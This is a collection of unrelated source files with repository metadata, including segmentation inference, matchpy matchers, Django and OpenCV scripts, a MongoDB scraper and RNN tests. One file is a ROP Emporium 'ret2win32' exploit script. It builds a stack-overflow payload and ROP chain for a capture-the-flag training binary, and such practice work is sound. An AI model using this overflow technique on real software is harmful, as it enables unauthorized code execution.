predict and visualize the image_list.
Args:
model (nn.Layer): Used to predict for input image.
model_path (str): The path of pretrained model.
transforms (transform.Compose): Preprocess for input image.
image_list (list): A list of image path to be predicted.
image_dir (str, optional): The root directory of the images predicted. Default: None.
save_dir (str, optional): The directory to save the visualized results. Default: 'output'.
aug_pred (bool, optional): Whether to use mulit-scales and flip augment for predition. Default: False.
scales (list|float, optional): Scales for augment. It is valid when `aug_pred` is True. Default: 1.0.
flip_horizontal (bool, optional): Whether to use flip horizontally augment. It is valid when `aug_pred` is True. Default: True.
flip_vertical (bool, optional): Whether to use flip vertically augment. It is valid when `aug_pred` is True. Default: False.
is_slide (bool, optional): Whether to predict by sliding window. Default: False.
stride (tuple|list, optional): The stride of sliding window, the first is width and the second is height.
It should be provided when `is_slide` is True.
crop_size (tuple|list, optional): The crop size of sliding window, the first is width and the second is height.
It should be provided when `is_slide` is True.
"""
utils.utils.load_entire_model(model, model_path)
model.eval()
nranks = paddle.distributed.get_world_size()
local_rank = paddle.distributed.get_rank()
if nranks > 1:
img_lists = partition_list(image_list, nranks)
else:
img_lists = [image_list]
added_saved_dir = os.path.join(save_dir, 'added_prediction')
pred_saved_dir = os.path.join(save_dir, 'pseudo_color_prediction')
logger.info("Start to predict...")
progbar_pred = progbar.Progbar(target=len(img_lists[0]), verbose=1)
with paddle.no_grad():
for i, im_path in enumerate(img_lists[local_rank]):
im = cv2.imread(im_path)
ori_shape = im.shape[:2]
im, _ = transforms(im)
im = im[np.newaxis, ...]
im = paddle.to_tensor(im)
if aug_pred:
pred = infer.aug_inference(
model,
im,
ori_shape=ori_shape,
transforms=transforms.transforms,
scales=scales,
flip_horizontal=flip_horizontal,
flip_vertical=flip_vertical,
is_slide=is_slide,
stride=stride,
crop_size=crop_size)
else:
pred = infer.inference(
model,
im,
ori_shape=ori_shape,
transforms=transforms.transforms,
is_slide=is_slide,
stride=stride,
crop_size=crop_size)
pred = paddle.squeeze(pred)
pred = pred.numpy().astype('uint8')
# get the saved name
filepath, shotname, extension = filepath_filename_fileext(im_path)
im_file = shotname+extension
# save added image
added_image = utils.visualize.visualize(im_path, pred, weight=0.6)
added_image_path = os.path.join(added_saved_dir, im_file)
mkdir(added_image_path)
cv2.imwrite(added_image_path, added_image)
# save pseudo color prediction
pred_mask = utils.visualize.get_pseudo_color_map(pred)
pred_saved_path = os.path.join(pred_saved_dir, os.path.splitext(im_file)[0] + ".png")
mkdir(pred_saved_path)
pred_mask.save(pred_saved_path)
progbar_pred.update(i + 1)
| [
"494056012@qq.com"
] | 494056012@qq.com |
f16a59cbded9413a22d9a9d7d5816f14d3b4749e | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part005112.py | f6ccb551e9b49171345708249fe74b4524d23c9a | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,369 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher13068(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({0: 1}), [
(VariableWithCount('i2.2.1.1.1.0', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher13068._instance is None:
CommutativeMatcher13068._instance = CommutativeMatcher13068()
return CommutativeMatcher13068._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 13067
if len(subjects) >= 1 and isinstance(subjects[0], Pow):
tmp1 = subjects.popleft()
subjects2 = deque(tmp1._args)
# State 13069
if len(subjects2) >= 1:
tmp3 = subjects2.popleft()
subst1 = Substitution(subst0)
try:
subst1.try_add_variable('i2.2.1.1.1.1', tmp3)
except ValueError:
pass
else:
pass
# State 13070
if len(subjects2) >= 1 and subjects2[0] == Rational(1, 2):
tmp5 = subjects2.popleft()
# State 13071
if len(subjects2) == 0:
pass
# State 13072
if len(subjects) == 0:
pass
# 0: sqrt(v)
yield 0, subst1
subjects2.appendleft(tmp5)
subjects2.appendleft(tmp3)
subjects.appendleft(tmp1)
return
yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
9c14033ca297f8e0621bf69583d670cb7e1b6410 | d6953b558412b2004d40adad4aa4c4ec38e4c274 | /dumbjumble.py | f471e10115ad91d45a0ce696141c157482179a29 | [] | no_license | devonreed/twice-jumble | a75c08dc0910be4006adf07f1f9e887861a75abb | 8e56848ccdcd79b935b8c7e1cfb5a63fdf33b650 | refs/heads/master | 2018-12-31T17:03:50.102837 | 2014-02-27T07:41:27 | 2014-02-27T07:41:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | import time
start = int(round(time.time() * 1000))
# permute() takes a list of letters and a prefix and
# returns all permutations of those letters with the
# prefix appended to the head
def permute(letters, prefix):
permutations = list()
for idx, letter in enumerate(letters):
permutations.append(prefix+letter)
newletters = list(letters)
del newletters[idx]
permutations += permute(newletters, prefix+letter)
return permutations
# prompt for user input
word = raw_input('Jumble Me! (enter a word): ')
letters = list(word)
# load our dictionary
f = open('2of12.txt', 'r')
possibilities = list()
# get all permutations of the user's input
allpermutations = permute(letters, '')
# loop through dictionary and look for any words
# that match our permutations
for dictword in f:
dictword = dictword.strip()
for permutation in allpermutations:
if permutation == dictword:
possibilities.append(dictword)
break
print possibilities
end = int(round(time.time() * 1000))
print "Total Time Elapsed: " + str(end-start) + "ms"; | [
"dreed@admins-MacBook-Pro-34.local"
] | dreed@admins-MacBook-Pro-34.local |
b89bbad48629a4bdeb5dc4a5188b064bf238cfee | 1222c3b6fc8f7e3c0bb3d0f4e871de745e2a65b2 | /lesons/wsgi.py | 74276de3e07fa9eec12c438a419c54f1f6a203da | [] | no_license | yuliiaboiko/good_mood | c8956688e47548cf92c0a14109e86cc69000805f | bc726cd25b010a30582e3f1f7980371891712dcc | refs/heads/master | 2020-04-24T19:46:27.773863 | 2019-02-23T16:04:02 | 2019-02-23T16:04:02 | 172,222,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
WSGI config for lesons project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'lesons.settings')
application = get_wsgi_application()
| [
"yulstrielnik@ukr.net"
] | yulstrielnik@ukr.net |
aa7b6d83df452c7b54da3fa1960b6ca05621a4c7 | 3899a00ff397c84ae7c6ed428e63760df4200277 | /final_project/trainers/GAN.py | 3b7c7d9910731e4dc73d2b360914142d3ae5aa7d | [] | no_license | ajignasu/ME592x-Spring2021 | 09066be044353dcd6627ff8ca5dec26e0c52bbaf | 9b0eb1bb73be7253d2c6ec428b0d4b83e6141e29 | refs/heads/main | 2023-04-09T03:22:55.003966 | 2021-04-22T20:18:09 | 2021-04-22T20:18:09 | 337,126,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,206 | py | import sys, os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch import autograd
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
import numpy as np
from models import *
import operator
import data
from data import TopoDataset1
import utils
from utils import *
from tensorboardX import SummaryWriter
# for reference:
# https://colab.research.google.com/github/pytorch/tutorials/blob/gh-pages/_downloads/e9c8374ecc202120dc94db26bf08a00f/dcgan_faces_tutorial.ipynb
def train(device, train_loader, validation_loader, validation_samples, epochs, tensorboard):
print('Beginning training.')
#initialize models => call nn.Module -> initialize weights -> send to device for training
generator = # call and initialize appropriate model here
generator.apply(weights_init_normal)
generator = generator.to(device)
discriminator = # call and initialize appropriate model here
discriminator.apply(weights_init_normal)
discriminator = discriminator.to(device)
#initialize optimizers
opt_generator = # select optimizer type of optimizer matters especially for different GANs
opt_discriminator = # select optimizer type of optimizer matters especially for different GANs
#iterate through epochs
for epoch in range(epochs):
#initialize losses
running_gen_loss, running_dis_loss = 0.0, 0.0
print('Beginning epoch ', epoch+1)
for idx, batch in enumerate(train_loader):
#load minibatch
initial_SE = batch['initial_SE']
initial_D = batch['initial_D']
final_SE = batch['final_SE']
final_D = batch['final_D']
#send minibatch to GPU for computation
initial_SE = initial_SE.to(device)
initial_D = initial_D.to(device)
final_SE = final_SE.to(device)
final_D = final_D.to(device)
#freeze discriminator
for p in discriminator.parameters():
p.requires_grad_(False)
#zero gradient (generator)
#insert code here
# generator prediction
pred_D = model(torch.cat((initial_SE, initial_D), 1))
#calculate generator loss
#insert code here
#call backward pass
#insert code here
#take generator's optimization step
#insert code here
#unfreeze discriminator
#zero gradient (discriminator)
#discriminator forward pass over appropriate inputs
# calculate discriminator losses
# call backward pass
# take discriminator's optimization step
#log losses to tensorboard
tensorboard.add_scalar('training/generator_loss', generator_loss, epoch)
tensorboard.add_scalar('training/discriminator_loss', discriminator_loss, epoch)
# evaluate validation set
# disable autograd engine
with torch.no_grad():
#iterate through validation set
for idx, batch in enumerate(validation_loader):
#load minibatch
initial_SE = batch['initial_SE']
initial_D = batch['initial_D']
final_SE = batch['final_SE']
final_D = batch['final_D']
#send minibatch to GPU for computation
initial_SE = initial_SE.to(device)
initial_D = initial_D.to(device)
final_SE = final_SE.to(device)
final_D = final_D.to(device)
# generator prediction
pred_D = model(torch.cat((initial_SE, initial_D), 1))
#calculate generator loss
#insert code here
#discriminator forward pass over appropriate inputs
# calculate discriminator losses
#log losses to tensorboard
tensorboard.add_scalar('validation/generator_loss', generator_loss, epoch)
tensorboard.add_scalar('validation/discriminator_loss', discriminator_loss, epoch)
# plot out some samples from validation
fig, axs = plt.subplots(len(val_samples), 4, figsize=(1*4,1*len(val_samples)),
subplot_kw={'aspect': 'auto'}, sharex=True, sharey=True, squeeze=True)
fig.suptitle('Generated Topology Optimization SE predictions')
for ax_row in axs:
for ax in ax_row:
ax.set_xticks([])
ax.set_yticks([])
for idx, sample in enumerate(validation_samples):
initial_SE = sample['initial_SE'].type_as(next(model.parameters()))
final_SE = sample['final_SE'].type_as(next(model.parameters()))
final_D = sample['final_D'].type_as(next(model.parameters()))
prediction_D = model(torch.cat((initial_SE, initial_D), 0).unsqueeze(0))
if isinstance(prediction_SE, tuple):
prediction_D = prediction_D[1]
axs[idx][0].imshow(log_normalization(initial_SE).cpu().detach().squeeze().numpy(), cmap=plt.cm.jet, interpolation='nearest')
axs[idx][1].imshow((1-initial_D.cpu().detach().squeeze().numpy()), vmin=0, vmax=1, cmap=plt.cm.gray, interpolation='nearest')
axs[idx][2].imshow((1-final_D.cpu().detach().squeeze().numpy()), vmin=0, vmax=1, cmap=plt.cm.gray, interpolation='nearest')
axs[idx][3].imshow((1-prediction_D.cpu().detach().squeeze().numpy()), vmin=0, vmax=1, cmap=plt.cm.gray, interpolation='nearest')
tensorboard.add_figure('Predicted Density', fig, epoch)
| [
"noreply@github.com"
] | ajignasu.noreply@github.com |
b8f563c1e26d8a2b93bdc796c7fc26a658a14232 | a60193f1bbca46110c97a0e519636d0d8ca7e98d | /树莓派人脸识别/人脸识别/代码/FaceDataction.py | 47f6ce4d676818493865a350da2b97b3e6343ef8 | [] | no_license | wen1949/raspbian | 33fb67d459ac17da651986736816c503e7ff46ad | 363d60ef6c9790ff62f872ebd51fe3d51a87f031 | refs/heads/main | 2023-02-04T18:04:58.809840 | 2020-12-19T12:18:37 | 2020-12-19T12:18:37 | 303,564,841 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,574 | py | import numpy as np
import cv2
# Haar cascade classifier for frontal-face detection
faceCascade = cv2.CascadeClassifier(r'C:\pytho3\Lib\site-packages\cv2\data\haarcascade_frontalface_default.xml')
# Haar cascade classifier for eye detection
eyeCascade = cv2.CascadeClassifier(r'C:\pytho3\Lib\site-packages\cv2\data\haarcascade_eye.xml')
# Open the default camera (device index 0)
cap = cv2.VideoCapture(0)
ok = True
while ok:
    # Grab one frame; ok reports whether the read succeeded, ending the loop on failure
    ok, img = cap.read()
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # convert to grayscale for the detectors
    #frame = cv2.flip(img,1)
    # Detect faces in the grayscale frame
    faces = faceCascade.detectMultiScale(
        gray,
        scaleFactor=1.2,
        minNeighbors=5,
        minSize=(100, 100)
    )
    # Detect eyes inside each detected face region
    # NOTE(review): `result` is rebound to [] inside this loop, so only the
    # last face's eyes survive, and the eye-drawing loop below raises
    # NameError if no face was ever detected -- confirm intended behaviour.
    for (x, y, w, h) in faces:
        fac_gray = gray[y: (y + h), x: (x + w)]
        result = []
        eyes = eyeCascade.detectMultiScale(
            fac_gray, 1.3, 2)
        # Convert eye coordinates from face-relative to absolute frame positions
        for (ex, ey, ew, eh) in eyes:
            result.append((x + ex, y + ey, ew, eh))
    # Draw rectangles: blue around faces, green around eyes
    for (x, y, w, h) in faces:
        cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)
    for (ex, ey, ew, eh) in result:
        cv2.rectangle(img, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2)
    cv2.imshow('video', img) # keep the display window updating
    k = cv2.waitKey(1)
    if k == 27: # press 'ESC' to quit
        break
cap.release() # release the camera
cv2.destroyAllWindows()
"noreply@github.com"
] | wen1949.noreply@github.com |
929b2e9e0f29eaedbe1824ef8ae472aa8a69823b | 39f4a2db88c327be0f2711563f9c4614413ddb3d | /scraper/runner.py | 7873ca74c0062821b3cac06b51341ba737bf60cd | [] | no_license | KrishNLP/2017_highlights | 83a7909b4be81ba662692c22a701da25d77f3a37 | 22b7fc6bbeb0ac831c53a5f152c3a33558f25368 | refs/heads/master | 2021-08-31T03:57:44.546430 | 2017-12-20T08:53:24 | 2017-12-20T08:53:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,541 | py | import pandas as pd
import json
import re
from mask import masked_domain
from mask import masked_domain
import csv
import random
import sys
sys.path.insert(0, '../../mongo_toolkit')
from q_to_csv import get_cursor
from itertools import chain
from pymongo import InsertOne, UpdateOne
from pymongo.errors import BulkWriteError
from bson.objectid import ObjectId
import time
from pprint import pprint
def cueBulkWrite(cursor, q, batch_size):
    """Execute the queued bulk operations *q* against *cursor* and return
    the number of documents the server reports as modified.

    Parameters:
        cursor: pymongo collection object exposing bulk_write().
        q: list of pymongo operations (InsertOne / UpdateOne ...).
        batch_size: size of the queued batch (informational; the caller
            has already sliced the queue to this size).

    Returns:
        int: nModified from the bulk API result (partial counts are
        still reported on a BulkWriteError).
    """
    modified = 0
    try:
        results = cursor.bulk_write(q, ordered = False)
        results = results.bulk_api_result
        print (results)
        modified += results['nModified']
    except BulkWriteError as bwe:
        # Bug fix: the counter lives in bwe.details (a dict), not on the
        # exception object itself -- `bwe['nModified']` raised TypeError.
        modified += bwe.details['nModified']
    # Bug fix: the original fell off the end and returned None, making
    # callers' `totalModified += cueBulkWrite(...)` raise TypeError.
    return modified
modified += bwe['nModified']
def updateDoc(): #refresh instance
    """Return a fresh, blank description-update template document."""
    blank_fields = ("descriptionFrom", "description", "OldDescription")
    return {field: '' for field in blank_fields}
def dotNotationGet(document, field):
    """Resolve a dotted *field* path (e.g. "location.name") inside the
    nested dict *document*.

    Returns the value found at the path, or None as soon as a segment
    is missing or the current value is not a dict.

    Bug fix: the original restarted the lookup from the top-level
    document whenever an intermediate value was falsy (returning values
    for the wrong key), and raised AttributeError when an intermediate
    value was a truthy non-dict.
    """
    current = document
    for item in field.split('.'):
        if not isinstance(current, dict):
            return None
        current = current.get(item)
    return current
def pipeline(org, locations, methods=None, doTest=False):
    """Try each scraper-method name in *methods* (resolved by eval in
    this module) until one returns a description for company *org*.

    Parameters:
        org: company name handed to each scraper method.
        locations: geographic cue values forwarded to the methods.
        methods: iterable of function names to try, in order.
        doTest: forwarded to each method as its `test` keyword.

    Returns:
        (found, label): the first truthy result (or False), and the
        matching method name with any case-insensitive "source"
        substring stripped ('' when nothing matched).
    """
    found = False
    foundMethod = ''
    for m in methods or []:
        # eval resolves the function by name; dangerous in general but
        # appropriate for this scripting context (names come from code).
        mfunc = eval(m)
        found = mfunc(org, locations, test=doTest)
        if found:
            # Bug fix: the original overwrote foundMethod on every
            # attempt, so it reported the last method tried rather
            # than the one that actually matched.
            foundMethod = m
            break
    # Bug fix: re.I must be passed as flags=; positionally it was being
    # consumed as re.sub's `count` argument, so 'Source'/'SOURCE'
    # survived the strip. Also, foundMethod starting as False made this
    # call raise TypeError whenever no method matched.
    return found, re.sub('source', '', foundMethod, flags=re.I)
def generateGeographicKeys(sample):
    """Extract geographic cue values from *sample*, adapting to its
    field structure (nested dict document vs. flat record)."""
    if isinstance(sample, dict):
        # Nested document: walk the dotted paths with dotNotationGet.
        dotted_paths = ['location.country.name.common', 'location.name']
        return [dotNotationGet(sample, path) for path in dotted_paths]
    # Flat record: plain subscript access by field name.
    flat_keys = ['location', 'focusedCountry']
    return [sample[key] for key in flat_keys]
def replaceVal(location, collection, assertkey = 'descriptionFrom', uniquekey = ['crunchbaseUUID'],\
    batch_size = 30, limit = False, locationHelpers = [],\
    projectkeys = [], update = False, printResponses = False): #pass several unique find keys if necessary
    """Scan *collection* for company docs in *location* that lack
    *assertkey*, scrape a replacement description for each via
    pipeline(), and queue MongoDB UpdateOne operations, flushed in
    batches when update=True.

    Parameters:
        location: location name to match (case sensitive).
        collection: Mongo collection name handed to get_cursor().
        assertkey: field whose absence selects docs still needing work.
        uniquekey / projectkeys: extra fields projected into each doc.
        batch_size: number of queued ops per bulk write.
        limit: optional cap on how many matched docs to process.
        locationHelpers: extra geographic search terms appended manually.
        update: False = dry run (print only), True = perform bulk writes.
        printResponses: forwarded to pipeline() as its doTest flag.
    """
    if update:
        print ('Update set to True. Writing...')
    # Match docs for this location under either schema shape, restricted
    # to those that do not yet carry the assert key.
    localeQuery = {"$or":[ {"location.name": location}, {"location": location}], assertkey : {"$exists" : False}}
    # NOTE(review): 'focussedCountry' here vs 'focusedCountry' in
    # generateGeographicKeys -- looks like a spelling mismatch; confirm
    # which field name the documents actually use.
    defaultProjected = {'_id' : 1, 'name' : 1, 'description' : 1, 'location' : 1, 'focussedCountry' : 1, 'scraperlog' :1}
    affirmProjected = {**defaultProjected, **{k:1 for k in uniquekey + projectkeys}}
    shellCursor = get_cursor(collection = collection)
    allRecords = shellCursor.find(localeQuery, affirmProjected)
    allRecords = list(allRecords)
    if allRecords:
        limitmsg = 'with limit: %s' % limit if limit else 'without limit'
        print ('Query matched with %s records. Beginning update sequence %s!\n' % (len(allRecords), limitmsg))
        start = time.time()
        # Derive geographic search cues from the first record's shape.
        first = allRecords[0]
        locationCues = generateGeographicKeys(first) + locationHelpers
        if locationCues:
            print ('Identified geographical search terms: %s' % str(locationCues))
        totalModified = 0
        bulkQueue = []
        allRecords = allRecords if not limit else allRecords[:limit]
        for item in allRecords:
            item = dict(item)
            # Flush a full batch before queueing more work.
            # NOTE(review): cueBulkWrite as written returns None, so the
            # `totalModified += result` below would raise TypeError --
            # verify cueBulkWrite returns its modified count.
            if len(bulkQueue) == batch_size and update is True:
                result = cueBulkWrite(shellCursor, bulkQueue, batch_size)
                totalModified += result
                bulkQueue = [] #refresh
            companyName = item.get('name')
            matchOn = {"name" : companyName, "_id" : item['_id']}
            foundReplacementDSC = False
            new = updateDoc()
            if assertkey not in item.keys(): #condition not necessary, query already matches docs without
                foundDSC, method = pipeline(companyName, locationCues, doTest = printResponses)
                if foundDSC:
                    # Compare case/whitespace-insensitively against the
                    # existing description ('void' stands in for empty).
                    similaritytest = item.get('description')
                    if similaritytest:
                        similaritytest = similaritytest.lower().strip()
                    else:
                        similaritytest = 'void'
                    if foundDSC.lower().strip() not in similaritytest:
                        print ('%s found replacement description for %s!' % (method, companyName))
                        foundReplacementDSC = foundDSC
                        new['descriptionFrom'] = method
                    else:
                        print ('%s"s description is the same!' % companyName)
                else:
                    print ('')
                    # print ('No description candidate found for %s! Retaining CB default!' % companyName)
            if foundReplacementDSC:
                # Queue the replacement, keeping the old text for audit.
                new['description'] = foundReplacementDSC
                new['OldDescription'] = item.get('description')
                print ('Proposed %s' % json.dumps({**new, **{'name' : companyName}}, indent =4))
                bulkQueue.append(UpdateOne(matchOn, {"$set" : new}))
        # Flush the final partial batch.
        if bulkQueue and update is True:
            bulkremainder = cueBulkWrite(shellCursor, bulkQueue, len(bulkQueue))
            totalModified += bulkremainder
        print ('Modified %s / %s' % (totalModified, len(allRecords)))
    # NOTE(review): `start` is only bound inside the `if allRecords`
    # branch; with an empty result set the line below raises NameError.
    print ('\n', '-' * 50, '\n')
    print ('Completed in %s seconds' % str(int(time.time() - start)))
passParams = {
"assertkey" : "descriptionFrom" ,
"uniquekey" : ["crunchbaseUUID"],
"batch_size" : 30,
"limit" : False,
"projectkeys" : [],
"update" : True,
"locationHelpers" : ["Korea"],
"printResponses" : False
}
"""
Params
-----------
location = case sensitive
assertKey = field exclusion condition for update
uniqueKey = key least likely to be modified - akin to _id and valuable for queries where string fields commonly fail w/ index conflicts
update = False: non-write run printing relevant document updates, True: Write
responseTest = print responses codes
locationHelpers = manual add fields auto signatureKeys for regex match
"""
replaceVal('seoul',collection = 'ShellImportCompanies', **passParams)
| [
"bhavish@oddup.com"
] | bhavish@oddup.com |
07684dae8331e4090c1d7c0b30f6d7355bdf19e3 | 0a3627e849caf21a0385079dea5bf81d4a281b72 | /ret2win32/pwngetshell.py | b3855cdd460b10fec5f32763e9e33a89877fc403 | [] | no_license | surajsinghbisht054/ROP-Emporium-walkthrough-collection | 7e0b3e4aadb4bf4a901c3788fe9fe8a56d047f0d | 4e9ac3f732c6af5ae5fd65e6ca7e3964fc8a3790 | refs/heads/master | 2020-04-14T13:45:04.356322 | 2019-01-02T19:01:39 | 2019-01-02T19:01:39 | 163,877,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,283 | py | #!/usr/bin/python
from struct import pack
import pwn
# ==================================================
# Usages: (python exp.py; cat) | ./binaryName
# =================================================
#+ ------------------------------------------------------------------ +
#= +----------------------------------------------------------------+ =
#= | | =
#= | _____ ___________ _____ | =
#= | / ___/ ___| ___ \ | __ \ | =
#= | \ `--.\ `--.| |_/ / | | \/_ __ ___ _ _ _ __ | =
#= | `--. \`--. \ ___ \ | | __| '__/ _ \| | | | '_ \ | =
#= | /\__/ /\__/ / |_/ / | |_\ \ | | (_) | |_| | |_) | | =
#= | \____/\____/\____/ \____/_| \___/ \__,_| .__/ | =
#= | | | | =
#= | |_| | =
#= +----------------------------------------------------------------+ =
#= +----------------------------------------------------------------+ =
#= | | =
#= | surajsinghbisht054@gmail.com | =
#= | www.bitforestinfo.com | =
#= | | =
#= | Try Smart, Try Hard & Don't Cheat | =
#= +----------------------------------------------------------------+ =
#+ ------------------------------------------------------------------ +
#pwn.context.log_level='debug'
#b = pwn.process('./ret2win32')
#b.recvuntil('>')
# 004 0x00000430 0x08048430 GLOBAL FUNC 16 imp.system
# ?v reloc.fgets
# 0x804a010
#
#
#
# ?v reloc.puts
# 0x804a014
#
# ?v sym.pwnme
# 0x80485f6
#
# ?v sym.imp.puts
# 0x8048420
# ROP chain layout: target function address, a dummy saved return
# address, then the function's first argument.
t_function = 0x08048400 # printf
args = 0x8048710  # presumably the address of a string in the binary -- confirm with r2
load = ''
load += pack('I',t_function)  # value that overwrites the saved EIP
load += 'AAAA' #pack('I', )  -- placeholder return address for after the call
load += pack('I', args )  # first argument consumed by the called function
# Buffer: 40 filler bytes up to the saved frame pointer, then the chain
pay = ''
pay += 'A'*40
pay += 'BBBB' # EBP
pay += load # EIP
print pay
#b = pwn.process('./ret2win32')
#b.recvuntil('>')
#b.sendline(pay)
#print pwn.hexdump(b.readall())
#pwn.gdb.attach(b)
#b.interactive()
#b.interactive()
| [
"surajsinghbisht054@gmail.com"
] | surajsinghbisht054@gmail.com |
4f57161c30458a93931767f1b0f4df2765d5d82c | a39e2f98fc610a0d06e7d91b000e91fe0dea5e95 | /category/urls.py | b7f0963c580771b5cc197f90006724e6745ffb68 | [] | no_license | Muslim2209/SmartERP | 91b093471a98911020732b1df5ee5585f815c6f4 | c669890bbbb3e6026db68f24ab4cb650296ff759 | refs/heads/main | 2023-01-27T19:29:10.030166 | 2020-12-07T13:28:03 | 2020-12-07T13:28:03 | 319,320,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | from django.urls import path
from category.views import CategoryListView, CategoryUpdateView, CategoryAddView
app_name = 'category'
urlpatterns = [
# path('', CategoryListView.as_view(), name='list'),
# path('<str:item>/list/', CategoryListView.as_view(), name='list'),
# path('<int:pk>/sub/', CategoryListView.as_view(), name='child_list'),
# path('<int:pk>/', CategoryUpdateView.as_view(), name='edit'),
# path('add/', CategoryAddView.as_view(), name='add'),
]
| [
"abdulhakiym2209@google.com"
] | abdulhakiym2209@google.com |
079c47d145a50adbf7c83122dc856c72fc5d5458 | 95b5e122844c73c025854b254251d9977322c6bf | /peaks/migrations/0003_peak_coordinates.py | 2251acbb5cdd18742dcec1c8d0f78738af7208ec | [] | no_license | romainver/PeakViewerAPI | 6f513f02afd0c4a69883fd06acd8015837455ab4 | b5dc5786522ce354b159621ad793271350f753d2 | refs/heads/main | 2023-03-27T04:11:50.115949 | 2021-03-29T07:54:03 | 2021-03-29T07:54:03 | 352,408,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | # Generated by Django 3.1.7 on 2021-03-27 22:58
import django.contrib.gis.db.models.fields
from django.db import migrations
from django.contrib.gis.geos import Point
class Migration(migrations.Migration):
    """Add a GIS PointField `coordinates` to the Peak model."""

    dependencies = [
        ('peaks', '0002_record'),
    ]

    operations = [
        migrations.AddField(
            model_name='peak',
            name='coordinates',
            # Backfill existing rows with a placeholder point (5, 23);
            # preserve_default=False then drops the default so new rows
            # must supply their own coordinates.
            field=django.contrib.gis.db.models.fields.PointField(default=Point(5, 23), srid=4326),
            preserve_default=False,
        ),
    ]
| [
"romain.verhaeghe@viacesi.fr"
] | romain.verhaeghe@viacesi.fr |
4d07b308dded69b4b85b776431306f9c85df7afa | d60977270b100b0b4a744e694d9b2604fd7f0a1b | /learning_users/basic_app/models.py | 0fb10bd6f3b2735ecd8ffbd3d00d7a9ce0d1d348 | [] | no_license | DenverAkshay/django-deployment-example | 185b4cdc8154eb61c8bcf73f670a1812266ce296 | c8010111455184de6ce4ba0210a50c9842219f77 | refs/heads/master | 2020-03-31T18:20:44.781313 | 2018-10-11T05:47:18 | 2018-10-11T05:47:18 | 152,455,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class UserProfileInfo(models.Model):
    """Extra profile data linked one-to-one with Django's built-in User."""
    user = models.OneToOneField(User,on_delete=models.CASCADE)
    #extras
    portfolio = models.URLField(blank = True)  # optional portfolio link
    profile_pic = models.ImageField(blank=True)  # optional avatar upload
    def __str__(self):
        """Show the linked account's username in admin and listings."""
        return self.user.username
| [
"denverbastian@gmail.com"
] | denverbastian@gmail.com |
69d8543de7c843eaf096b7ca8e5d79c4c75c6bd7 | 73fd7cb82fa5abcbdaa0025b97fb943abba53f44 | /test/layer/rnn_test.py | d2f2ab6f30e2ac47173deb904333a169ff105eec | [] | no_license | huxinran/cnn | 6956fa3c675db23e377886a19646e202cfcbfc11 | e3d6166665d0d83246fd2097b9f6e0c14315c2b0 | refs/heads/master | 2021-09-04T02:19:54.227106 | 2017-12-31T14:22:18 | 2017-12-31T14:22:18 | 113,939,086 | 0 | 1 | null | 2017-12-31T14:22:20 | 2017-12-12T03:34:29 | Python | UTF-8 | Python | false | false | 1,786 | py | import unittest
import numpy as np
import sys
sys.path.append('C:\\Users\\Xinran\\Desktop\\cnn\\src\\layer\\')
sys.path.append('C:\\Users\\Xinran\\Desktop\\cnn\\src\\')
from rnn import RNNLayer as RNN
import utils
class TestRNNLayer(unittest.TestCase):
def test_init(self):
config = {
'dim_hidden' : 10
, 'len' : 2
}
l = RNN(config)
pass
def test_accept(self):
config = {
'dim_hidden' : 10
, 'len' : 2
}
l = RNN(config)
l.accept([26])
pass
def test_forward(self):
config = {
'dim_hidden' : 10
, 'len' : 2
}
l = RNN(config)
l.accept([26])
x = [np.zeros([26])] * 2
x[0][0] = 1.0
x[1][1] = 1.0
l.forward(x)
pass
def test_backward(self):
config = {
'dim_hidden' : 10
, 'len' : 2
}
l = RNN(config)
l.accept([26])
x = [np.zeros([26])] * 2
x[0][0] = 1.0
x[1][1] = 1.0
y = l.forward(x)
dy = [None] * 2
loss, dy[0] = utils.cross_entropy(utils.softmax(y[0]), np.array([0]))
loss, dy[1] = utils.cross_entropy(utils.softmax(y[1]), np.array([1]))
dW, dU, dV = l.backward(dy)
def test_fit(self):
config = {
'dim_hidden' : 10
, 'len' : 2
, 'step_size' : 0.01
}
l = RNN(config)
l.accept([26])
x = [np.zeros([26])] * 2
x[0][0] = 1.0
x[1][1] = 1.0
y = np.array([1, 2])
l.fit(x, y, 100, config)
def test_repr(self):
pass
